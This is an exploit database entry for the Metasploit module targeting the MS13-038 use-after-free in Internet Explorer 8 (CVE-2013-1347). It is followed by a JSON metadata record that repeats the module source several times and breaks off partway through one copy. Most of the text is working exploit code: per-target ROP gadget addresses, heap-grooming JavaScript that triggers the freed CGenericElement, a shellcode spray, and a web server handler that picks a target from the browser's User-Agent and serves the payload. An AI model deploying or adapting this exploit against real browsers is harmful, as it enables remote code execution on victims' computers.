MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability
2013-05-05T17:04:17
ID MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF Type metasploit Reporter Rapid7 Modified 2017-07-24T13:26:21
Description
This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::RopDb
include Msf::Exploit::Remote::BrowserAutopwn
autopwn_info({
:ua_name => HttpClients::IE,
:ua_minver => "8.0",
:ua_maxver => "8.0",
:javascript => true,
:os_name => OperatingSystems::Match::WINDOWS,
:rank => GoodRanking
})
def initialize(info={})
super(update_info(info,
'Name' => "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in Microsoft Internet Explorer. A
use-after-free condition occurs when a CGenericElement object is freed, but a
reference is kept on the Document and used again during rendering, an invalid
memory that's controllable is used, and allows arbitrary code execution under the
context of the user.
Please note: This vulnerability has been exploited in the wild on 2013 May, in
the compromise of the Department of Labor (DoL) Website.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown',
'EMH',
'juan vazquez', #RCA
'sinn3r' #RCA
],
'References' =>
[
[ 'CVE', '2013-1347' ],
[ 'OSVDB', '92993' ],
[ 'MSB', 'MS13-038' ],
[ 'US-CERT-VU', '237655' ],
[ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],
[ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup
],
'Payload' =>
{
'BadChars' => "\x00",
'Space' => 1024,
'DisableNops' => true
},
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'
},
'Platform' => 'win',
'Targets' =>
[
[ 'Automatic', {} ],
[ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],
[ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],
[ 'IE 8 on Windows 7', { 'Rop' => :jre } ]
],
'Privileged' => false,
'DisclosureDate' => "May 3 2013",
'DefaultTarget' => 0))
register_options(
[
OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
])
end
def get_target(agent)
return target if target.name != 'Automatic'
nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
ie = agent.scan(/MSIE (\d)/).flatten[0] || ''
ie_name = "IE #{ie}"
case nt
when '5.1'
os_name = 'Windows XP SP3'
when '5.2'
os_name = 'Windows Server 2003'
when '6.0'
os_name = 'Windows Vista'
when '6.1'
os_name = 'Windows 7'
else
# OS not supported
return nil
end
targets.each do |t|
if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
print_status("Target selected as: #{t.name}")
return t
end
end
return nil
end
def get_payload(t, cli)
rop_payload = ''
# Extra junk in the end to make sure post code execution is stable.
p = payload.encoded
case t['Rop']
when :msvcrt
align = "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
rop_payload = ''
if t.name == 'IE 8 on Windows XP SP3'
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})
elsif t.name == 'IE 8 on Windows Server 2003'
rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})
end
else
code = "\x81\xEC\xF0\xD8\xFF\xFF" # sub esp, -10000
code << p
code << rand_text_alpha(12000)
rop_payload = generate_rop_payload('java', code)
end
return rop_payload
end
def load_exploit_html(my_target, cli)
case my_target['Rop']
when :msvcrt
case my_target.name
when 'IE 8 on Windows XP SP3'
align_esp = Rex::Text.to_unescape([0x77c4d801].pack("V*")) # ADD ESP, 2C; RET
xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack("V*")) # XCHG EAX, ESP, RET
when 'IE 8 on Windows Server 2003'
align_esp = Rex::Text.to_unescape([0x77bde7f6].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack("V*"))
end
else
align_esp = Rex::Text.to_unescape([0x7C3445F8].pack("V*"))
xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack("V*"))
end
padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))
js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))
html = %Q|
<!doctype html>
<HTML XMLNS:t ="urn:schemas-microsoft-com:time">
<head>
<meta>
<?IMPORT namespace="t" implementation="#default#time2">
</meta>
<script>
#{js_mstime_malloc}
function helloWorld()
{
sparkle = unescape("ABCD");
for (i=0; i < 2; i++) {
sparkle += unescape("ABCD");
}
sparkle += unescape("AB");
sparkle += unescape("#{js_payload}");
magenta = unescape("#{align_esp}");
for (i=0; i < 0x70/4; i++) {
if (i == 0x70/4-1) { magenta += unescape("#{xchg_esp}"); }
else { magenta += unescape("#{align_esp}"); }
}
magenta += sparkle;
document.body.contentEditable="true";
f0 = document.createElement('span');
f1 = document.createElement('span');
f2 = document.createElement('span');
document.body.appendChild(f0);
document.body.appendChild(f1);
document.body.appendChild(f2);
for (i=0; i < 20; i++) { document.createElement("img"); }
f2.appendChild(document.createElement('datalist'));
f1.appendChild(document.createElement('span'));
CollectGarbage();
f1.appendChild(document.createElement('table'));
try { f0.offsetParent=null;}
catch(e) { }
f2.innerHTML = "";
f1.innerHTML = "";
f0.appendChild(document.createElement('hr'));
mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:"myanim"});
}
</script>
</head>
<body onload="eval(helloWorld());">
<t:ANIMATECOLOR id="myanim"/>
</body>
</html>
|
return html
end
def on_request_uri(cli, request)
agent = request.headers['User-Agent']
uri = request.uri
print_status("Requesting: #{uri}")
my_target = get_target(agent)
if my_target.nil?
print_error("Browser not supported, sending 404: #{agent}")
send_not_found(cli)
return
end
html = load_exploit_html(my_target, cli)
html = html.gsub(/^ {4}/, '')
print_status("Sending HTML...")
send_response(cli, html, {'Content-Type'=>'text/html'})
end
end
{"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2018-04-11T22:18:25", "history": [{"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-05-03T20:42:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/ie_cgenericelement_uaf", "reporter": "Rapid7", "references": ["#", "#", "http://www.microsoft.com/technet/security/bulletin/MS13-038.mspx", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL", "http://cvedetails.com/cve/cve-2013-1347"], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-07-02T23:17:19", "history": [], "viewCount": 28, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\n\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-07-02T23:17:19", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://www.rapid7.com/db/modules/exploit/windows/browser/ie_cgenericelement_uaf", "reporter": "Rapid7", "references": ["#", "#", "http://www.microsoft.com/technet/security/bulletin/MS13-038.mspx", "http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx", "http://r-7.co/IE8-DOL", "http://cvedetails.com/cve/cve-2013-1347"], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-07-24T19:24:46", "history": [], "viewCount": 37, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n <script>\n #{js_mstime_malloc}\n\n function helloWorld()\n {\n sparkle = unescape(\"ABCD\");\n for (i=0; i < 2; i++) {\n sparkle += unescape(\"ABCD\");\n }\n sparkle += unescape(\"AB\");\n sparkle += unescape(\"#{js_payload}\");\n magenta = unescape(\"#{align_esp}\");\n for (i=0; i < 0x70/4; i++) {\n if (i == 0x70/4-1) { magenta += unescape(\"#{xchg_esp}\"); }\n else { magenta += unescape(\"#{align_esp}\"); }\n }\n magenta += sparkle;\n\n document.body.contentEditable=\"true\";\n f0 = document.createElement('span');\n f1 = document.createElement('span');\n f2 = document.createElement('span');\n document.body.appendChild(f0);\n document.body.appendChild(f1);\n document.body.appendChild(f2);\n for (i=0; i < 20; i++) { document.createElement(\"img\"); }\n f2.appendChild(document.createElement('datalist'));\n f1.appendChild(document.createElement('span'));\n CollectGarbage();\n f1.appendChild(document.createElement('table'));\n try { f0.offsetParent=null;}\n catch(e) { }\n f2.innerHTML = \"\";\n f1.innerHTML = \"\";\n f0.appendChild(document.createElement('hr'));\n mstime_malloc({shellcode:magenta, heapBlockSize:0x38, objId:\"myanim\"});\n }\n </script>\n </head>\n <body onload=\"eval(helloWorld());\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb"}, "lastseen": "2017-07-24T19:24:46", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:EXPLOIT/WINDOWS/BROWSER/IE_CGENERICELEMENT_UAF", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CGenericElement object is freed, but a reference is kept on the Document and used again during rendering, an invalid memory that's controllable is used, and allows arbitrary code execution under the context of the user. Please note: This vulnerability has been exploited in the wild on 2013 May, in the compromise of the Department of Labor (DoL) Website.", "published": "2013-05-05T17:04:17", "modified": "2017-07-24T13:26:21", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1347"], "lastseen": "2017-08-21T15:30:05", "history": [], "viewCount": 44, "enchantments": {}, "objectVersion": "1.4", "metasploitReliability": "Good", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ie_cgenericelement_uaf.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => GoodRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-038 Microsoft Internet Explorer CGenericElement Object Use-After-Free Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. A\n use-after-free condition occurs when a CGenericElement object is freed, but a\n reference is kept on the Document and used again during rendering, an invalid\n memory that's controllable is used, and allows arbitrary code execution under the\n context of the user.\n\n Please note: This vulnerability has been exploited in the wild on 2013 May, in\n the compromise of the Department of Labor (DoL) Website.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown',\n 'EMH',\n 'juan vazquez', #RCA\n 'sinn3r' #RCA\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1347' ],\n [ 'OSVDB', '92993' ],\n [ 'MSB', 'MS13-038' ],\n [ 'US-CERT-VU', '237655' ],\n [ 'URL', 'http://blogs.technet.com/b/msrc/archive/2013/05/03/microsoft-releases-security-advisory-2847140.aspx'],\n [ 'URL', 'http://r-7.co/IE8-DOL' ] # sinn3r's writeup\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'Space' => 1024,\n 'DisableNops' => true\n },\n 'DefaultOptions' =>\n {\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows Vista', { 'Rop' => :jre } ],\n [ 'IE 8 on Windows Server 2003', { 'Rop' => :msvcrt } ],\n [ 'IE 8 on Windows 7', { 'Rop' => :jre } ]\n ],\n 'Privileged' => false,\n 'DisclosureDate' => \"May 3 2013\",\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])\n ])\n\n end\n\n def get_target(agent)\n return target if target.name != 'Automatic'\n\n nt = agent.scan(/Windows NT (\\d\\.\\d)/).flatten[0] || ''\n ie = agent.scan(/MSIE (\\d)/).flatten[0] || ''\n\n ie_name = \"IE #{ie}\"\n\n case nt\n when '5.1'\n os_name = 'Windows XP SP3'\n when '5.2'\n os_name = 'Windows Server 2003'\n when '6.0'\n os_name = 'Windows Vista'\n when '6.1'\n os_name = 'Windows 7'\n else\n # OS not supported\n return nil\n end\n\n targets.each do |t|\n if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))\n print_status(\"Target selected as: #{t.name}\")\n return t\n end\n end\n\n return nil\n end\n\n def get_payload(t, cli)\n rop_payload = ''\n\n # Extra junk in the end to make sure post code execution is stable.\n p = payload.encoded\n\n case t['Rop']\n when :msvcrt\n align = \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # Stack adjustment # add esp, -3500\n rop_payload = ''\n if t.name == 'IE 8 on Windows XP SP3'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'xp'})\n elsif t.name == 'IE 8 on Windows Server 2003'\n rop_payload = generate_rop_payload('msvcrt', align+p, {'target'=>'2003'})\n end\n\n else\n code = \"\\x81\\xEC\\xF0\\xD8\\xFF\\xFF\" # sub esp, -10000\n code << p\n code << rand_text_alpha(12000)\n\n rop_payload = generate_rop_payload('java', code)\n end\n\n return rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n\n html = %Q|\n <!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" 